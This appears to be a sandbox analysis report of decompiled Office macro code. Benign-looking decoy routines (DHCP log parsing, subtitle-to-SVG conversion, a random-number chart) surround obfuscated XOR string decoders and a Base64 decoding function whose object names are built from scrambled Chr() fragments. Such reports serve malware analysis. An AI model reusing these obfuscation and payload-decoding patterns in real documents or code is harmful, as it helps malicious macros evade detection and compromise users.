    strLine = objtextFile.ReadLine

    ReadLine

    381

    If InStr(strLine, ",") Then

    InStr

    382

    arrDHCPRecord = Split(strLine, ",")

    Split

    383

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    384

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    385

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    386

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    387

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    388

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    389

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    390

    i = i + 1

    391

    Endif

    392

    Loop

    AtEndOfStream

    394

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    395

    Const ForReading = 1

    397

    Set objFSO = CreateObject("Scripting.FileSystemObject")

    CreateObject

    398

    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" & "DhcpSrvLog-Mon.log", ForReading)

    OpenTextFile

    ForReading

    401

    Wscript.Echo vbCrLf & "DHCP Records"

    Echo

    vbCrLf

    403

    Do While objtextFile.AtEndOfStream <> True

    AtEndOfStream

    404

    strLine = objtextFile.ReadLine

    ReadLine

    405

    If InStr(strLine, ",") Then

    InStr

    406

    arrDHCPRecord = Split(strLine, ",")

    Split

    407

    Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)

    Echo

    vbCrLf

    408

    Wscript.Echo "Date: " & arrDHCPRecord(1)

    Echo

    409

    Wscript.Echo "Time: " & arrDHCPRecord(2)

    Echo

    410

    Wscript.Echo "Description: " & arrDHCPRecord(3)

    Echo

    411

    Wscript.Echo "IP Address: " & arrDHCPRecord(4)

    Echo

    412

    Wscript.Echo "Host Name: " & arrDHCPRecord(5)

    Echo

    413

    Wscript.Echo "MAC Address: " & arrDHCPRecord(6)

    Echo

    414

    i = i + 1

    415

    Endif

    416

    Loop

    AtEndOfStream

    418

    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i

    Echo

    vbCrLf

    427

    End Sub

    APIsMeta Information

    OpenTextFile

    AtEndOfStream

    ReadLine

    AtEndOfStream

    ReadLine

    InStr

    Split

    Left

    Split

    Mid

    AtEndOfStream

    ReadLine

    Replace

    Replace

    vbCrLf

    Replace

    mult

    Replace

    mult

    Replace

    mult

    vbCrLf

    vbCrLf

    Split

    vbCrLf

    UBound

    Int

    UBound

    Replace

    vbCrLf

    vbCrLf

    Echo

    Close

    StringsDecrypted Strings
    """"
    """"
    " --> "
    """"
    "&gt;"
    "&lt;"
    ","
    "."
    ":"
    "<"
    ">"
    " --> "
    ":"
    ":"
    """"
    """"
    "&gt;"
    "&lt;"
    "<"
    ">"
    "&lt;"
    "<"
    "&gt;"
    ">"
    """"
    """"
    ","
    "."
    ","
    "."
    ","
    "."
    ","
    "."
    ","
    "."
    ","
    "."
    LineInstructionMeta Information
    3886

    Function ParseSrt(path, offset, color)

    3888

    Dim svg

    3889

    svg = ""

    3891

    Set f = fso.OpenTextFile(path, 1)

    OpenTextFile

    3893

    Dim num

    3894

    num = ""

    3895

    t1 = 0

    3896

    t2 = 0

    3900

    Do While True

    3901

    If Not (f.AtEndOfStream) Then

    AtEndOfStream

    3902

    num = f.ReadLine

    ReadLine

    3903

    Else

    3904

    Exit Do

    3905

    Endif

    3907

    If Not (f.AtEndOfStream) Then

    AtEndOfStream

    3908

    tt = f.ReadLine

    ReadLine

    3909

    Else

    3910

    Exit Do

    3911

    Endif

    3913

    pos = InStr(tt, " --> ")

    InStr

    3914

    arr1 = Split(Left(tt, pos), ":")

    Split

    Left

    3915

    arr2 = Split(Mid(tt, pos + 5), ":")

    Split

    Mid

    3917

    t1 = arr1(0) * 3600 + arr1(1) * 60 + arr1(2)

    3918

    t2 = arr2(0) * 3600 + arr2(1) * 60 + arr2(2)

    3920

    theText = ""

    3921

    Do While Not (f.AtEndOfStream)

    AtEndOfStream

    3922

    Text = f.ReadLine

    ReadLine

    3923

    Text = Replace(Text, "<", "&lt;")

    Replace

    3924

    Text = Replace(Text, ">", "&gt;")

    Replace

    3926

    If Text = "" Then

    3927

    Exit Do

    3928

    Endif

    3929

    If theText <> "" Then

    3930

    theText = theText & vbCrLf

    vbCrLf

    3931

    Endif

    3932

    theText = theText & Text

    3933

    Loop

    AtEndOfStream

    3935

    Y = Replace(t1 * mult, ",", ".")

    Replace

    mult

    3936

    h = Replace((t2 - t1) * mult, ",", ".")

    Replace

    mult

    3937

    m = Replace((t1 + (t2 - t1) / 2) * mult, ",", ".")

    Replace

    mult

    3939

    svg = svg & "<rect style=""fill:" & color & """ x=""" & offset & """ y=""" & Y & """ width=""400"" height=""" & h & """/>" & vbCrLf

    vbCrLf

    3942

    svg = svg & "<text dominant-baseline=""middle"" x=""" & offset & """ y=""" & m & """>" & vbCrLf

    vbCrLf

    3943

    Lines = Split(theText, vbCrLf)

    Split

    vbCrLf

    3944

    If UBound(Lines) > 0 Then

    UBound

    3945

    dy = - 0.5 - Int(UBound(Lines) / 2)

    Int

    UBound

    3946

    For Each l in Lines

    3947

    thedy = Replace(dy, ",", ".")

    Replace

    3948

    svg = svg & "<tspan x=""" & offset & """ dy=""" & thedy & "em"">" & l & "</tspan>" & vbCrLf

    vbCrLf

    3949

    dy = 1

    3950

    Next

    3951

    Else

    3952

    svg = svg & Lines(0)

    3953

    Endif

    3954

    svg = svg & "</text>" & vbCrLf

    vbCrLf

    3956

    Wscript.Echo num

    Echo

    3957

    Loop

    3959

    f.Close

    Close

    3960

    If t2 > Max Then

    3961

    Max = t2

    3962

    Endif

    3964

    ParseSrt = svg

    3965

    End Function

    APIsMeta Information

    Randomize

    CreateObject

    Initialize

    SetColumnNames

    Echo

    Int

    Rnd

    Add

    Finalize

    Left

    ScriptFullName

    Wscript

    InStrRev

    LoadChartTemplate

    ReplaceTag

    ReplaceTag

    ReplaceTag

    SaveChart

    CreateObject

    Run

    StringsDecrypted Strings
    "Vbsedit.PivotTable"
    "Number of events"
    "Sum"
    "n"
    "\"
    "column"
    "Central limit theorem"
    "title"
    "bars"
    "vertical"
    "false"
    "stacked"
    "Wscript.Shell"
    LineInstructionMeta Information
    116

    Private Sub tii()

    127

    Randomize

    Randomize

    129

    Set pivot = CreateObject("Vbsedit.PivotTable")

    CreateObject

    130

    pivot.Initialize 2, 1

    Initialize

    131

    pivot.SetColumnNames "Sum", "n", "Number of events"

    SetColumnNames

    134

    Total = 100000

    136

    For n = 2 To 7

    137

    Wscript.Echo n

    Echo

    138

    For k = 1 To Total

    139

    s = 0

    140

    For i = 1 To n

    141

    s = s + Int(6 * Rnd + 1)

    Int

    Rnd

    142

    Next

    144

    pivot.Add s, n, 1

    Add

    146

    Next

    147

    Next

    150

    pivot.Finalize

    Finalize

    153

    folder = Left(Wscript.ScriptFullName, InStrRev(Wscript.ScriptFullName, "\"))

    Left

    ScriptFullName

    Wscript

    InStrRev

    155

    pivot.LoadChartTemplate "column"

    LoadChartTemplate

    156

    pivot.ReplaceTag "title", "Central limit theorem"

    ReplaceTag

    157

    pivot.ReplaceTag "bars", "vertical"

    ReplaceTag

    158

    pivot.ReplaceTag "stacked", "false"

    ReplaceTag

    159

    pivot.SaveChart folder & "column1.htm"

    SaveChart

    161

    Set Shell = CreateObject("Wscript.Shell")

    CreateObject

    162

    Shell.Run folder & "column1.htm", 1, False

    Run

    165

    End Sub

    APIsMeta Information

    CreateObject

    Part of subcall function vw823nw7@ThisDocument: p_

    Part of subcall function vw823nw7@ThisDocument: UBound

    Part of subcall function vw823nw7@ThisDocument: LBound

    Part of subcall function vw823nw7@ThisDocument: UBound

    Chr

    createElement

    Part of subcall function vw823nw7@ThisDocument: p_

    Part of subcall function vw823nw7@ThisDocument: UBound

    Part of subcall function vw823nw7@ThisDocument: LBound

    Part of subcall function vw823nw7@ThisDocument: UBound

    Chr

    DataType

    Part of subcall function vw823nw7@ThisDocument: p_

    Part of subcall function vw823nw7@ThisDocument: UBound

    Part of subcall function vw823nw7@ThisDocument: LBound

    Part of subcall function vw823nw7@ThisDocument: UBound

    Chr

    Text

    NodeTypedValue

    StringsDecrypted Strings
    "I""""W"""\"I"H""6"""*"""@"""K""I""@"k"g""q""i"a"""j""""p"""
    "f"""2"""0"
    ""f"m"""j"""*f"""e"""w""a"2"0"
    LineInstructionMeta Information
    101

    Private Function Base64ToArray(base64 as String) as Variant

    103

    Dim oc41c7c4 as Object

    104

    Dim uk9vchaq as Object

    106

    Set oc41c7c4 = CreateObject(vw823nw7("I" & "" & "W" & "" & Chr(92) & "I" & Chr(72) & "" & Chr(54) & "" & "*" & "" & Chr(64) & "" & "K" & "I" & "@" & Chr(107) & "g" & "q" & "i" & Chr(97) & "" & "j" & "" & "p" & ""))

    CreateObject

    Chr

    107

    Set uk9vchaq = oc41c7c4.createElement(vw823nw7("f" & "" & Chr(50) & "" & "0"))

    createElement

    Chr

    109

    uk9vchaq.DataType = vw823nw7("f" & Chr(109) & "" & "j" & "" & Chr(42) & Chr(102) & "" & "e" & "" & Chr(119) & "" & Chr(97) & "2" & Chr(48))

    DataType

    Chr

    110

    uk9vchaq.Text = base64

    Text

    112

    Base64ToArray = uk9vchaq.NodeTypedValue

    NodeTypedValue

    114

    End Function

    APIsMeta Information

    Int

    Len

    Int

    Len

    Int

    Len

    FormatNumber

    Mid

    StringsDecrypted Strings
    "0"
    "0"
    "0"
    "0"
    "0"
    "0"
    LineInstructionMeta Information
    4116

    Function SecondsToString(seconds)

    4117

    Dim t

    4118

    t = seconds

    4119

    h = Int(t / 3600)

    Int

    4120

    t = t - h * 3600

    4121

    If Len(h) = 1 Then

    Len

    4122

    h = "0" & h

    4123

    Endif

    4124

    n = Int((t Mod 3600) / 60)

    Int

    4125

    t = t - n * 60

    4126

    If Len(n) = 1 Then

    Len

    4127

    n = "0" & n

    4128

    Endif

    4129

    s = Int(t)

    Int

    4130

    If Len(s) = 1 Then

    Len

    4131

    s = "0" & s

    4132

    Endif

    4133

    m = t - s

    4134

    m = FormatNumber(m, 3)

    FormatNumber

    4136

    SecondsToString = h & ":" & n & ":" & s & "," & Mid(m, 3)

    Mid

    4137

    End Function

    APIsMeta Information

    Split

    Split

    UBound

    UBound

    StringsDecrypted Strings
    ":"
    ","
    LineInstructionMeta Information
    4140

    Function StringToSeconds(str)

    4142

    arr = Split(str, ":")

    Split

    4144

    t = arr(0) * 3600 + arr(1) * 60

    4146

    s = Split(arr(2), ",")

    Split

    4148

    If UBound(s) >= 0 Then

    UBound

    4149

    t = t + s(0)

    4151

    If UBound(s) >= 1 Then

    UBound

    4152

    t = t + s(1) / 1000

    4153

    Endif

    4154

    Endif

    4156

    StringToSeconds = t

    4157

    End Function

    APIsMeta Information

    p_

    UBound

    LBound

    UBound

    StringsDecrypted Strings
    "qc7nf2um"
    LineInstructionMeta Information
    12

    Function xwygun72(str as String) as String

    13

    Const p_ as String = "qc7nf2um"

    14

    Dim sb_() as Byte, pb_() as Byte

    15

    sb_ = t8gb(str)

    16

    pb_ = t8gb(p_)

    p_

    18

    Dim uL as Long

    19

    uL = UBound(sb_)

    UBound

    21

    Redim scb_(0 To uL)

    23

    Dim idx as Long

    25

    For idx = LBound(sb_) To uL

    LBound

    26

    If Not sb_(idx) = 0 Then

    27

    c = sb_(idx)

    28

    For i = 0 To UBound(pb_)

    UBound

    29

    c = c Xor pb_(i)

    30

    Next i

    UBound

    31

    scb_(idx) = c

    32

    Endif

    34

    Next idx

    LBound

    36

    xwygun72 = o51z(scb_)

    37

    End Function

    APIsMeta Information

    p_

    UBound

    LBound

    UBound

    StringsDecrypted Strings
    "fdqt7e5d"
    LineInstructionMeta Information
    43

    Function vw823nw7(str as String) as String

    44

    Const p_ as String = "fdqt7e5d"

    45

    Dim sb_() as Byte, pb_() as Byte

    46

    sb_ = udax(str)

    47

    pb_ = udax(p_)

    p_

    49

    Dim uL as Long

    50

    uL = UBound(sb_)

    UBound

    52

    Redim scb_(0 To uL)

    54

    Dim idx as Long

    56

    For idx = LBound(sb_) To uL

    LBound

    57

    If Not sb_(idx) = 0 Then

    58

    c = sb_(idx)

    59

    For i = 0 To UBound(pb_)

    UBound

    60

    c = c Xor pb_(i)

    61

    Next i

    UBound

    62

    scb_(idx) = c

    63

    Endif

    65

    Next idx

    LBound

    67

    vw823nw7 = x74t(scb_)

    68

    End Function

    APIsMeta Information

    p_

    UBound

    LBound

    UBound

    StringsDecrypted Strings
    "n5mzlpzj"
    LineInstructionMeta Information
    72

    Function fh20tl5p(str as String) as String

    73

    Const p_ as String = "n5mzlpzj"

    74

    Dim sb_() as Byte, pb_() as Byte

    75

    sb_ = wdix(str)

    76

    pb_ = wdix(p_)

    p_

    78

    Dim uL as Long

    79

    uL = UBound(sb_)

    UBound

    81

    Redim scb_(0 To uL)

    83

    Dim idx as Long

    85

    For idx = LBound(sb_) To uL

    LBound

    86

    If Not sb_(idx) = 0 Then

    87

    c = sb_(idx)

    88

    For i = 0 To UBound(pb_)

    UBound

    89

    c = c Xor pb_(i)

    90

    Next i

    UBound

    91

    scb_(idx) = c

    92

    Endif

    94

    Next idx

    LBound

    96

    fh20tl5p = h27i(scb_)

    97

    End Function

    LineInstructionMeta Information
    9

    Function t8gb(str as String) as Variant

    9

    Dim bytes() as Byte

    9

    bytes = str

    9

    t8gb = bytes

    9

    End Function

    LineInstructionMeta Information
    10

    Function o51z(bytes() as Byte) as String

    10

    Dim str as String

    10

    str = bytes

    10

    o51z = str

    10

    End Function

    LineInstructionMeta Information
    40

    Function udax(str as String) as Variant

    40

    Dim bytes() as Byte

    40

    bytes = str

    40

    udax = bytes

    40

    End Function

    LineInstructionMeta Information
    41

    Function x74t(bytes() as Byte) as String

    41

    Dim str as String

    41

    str = bytes

    41

    x74t = str

    41

    End Function

    LineInstructionMeta Information
    69

    Function wdix(str as String) as Variant

    69

    Dim bytes() as Byte

    69

    bytes = str

    69

    wdix = bytes

    69

    End Function

    LineInstructionMeta Information
    70

    Function h27i(bytes() as Byte) as String

    70

    Dim str as String

    70

    str = bytes

    70

    h27i = str

    70

    End Function

    Reset < >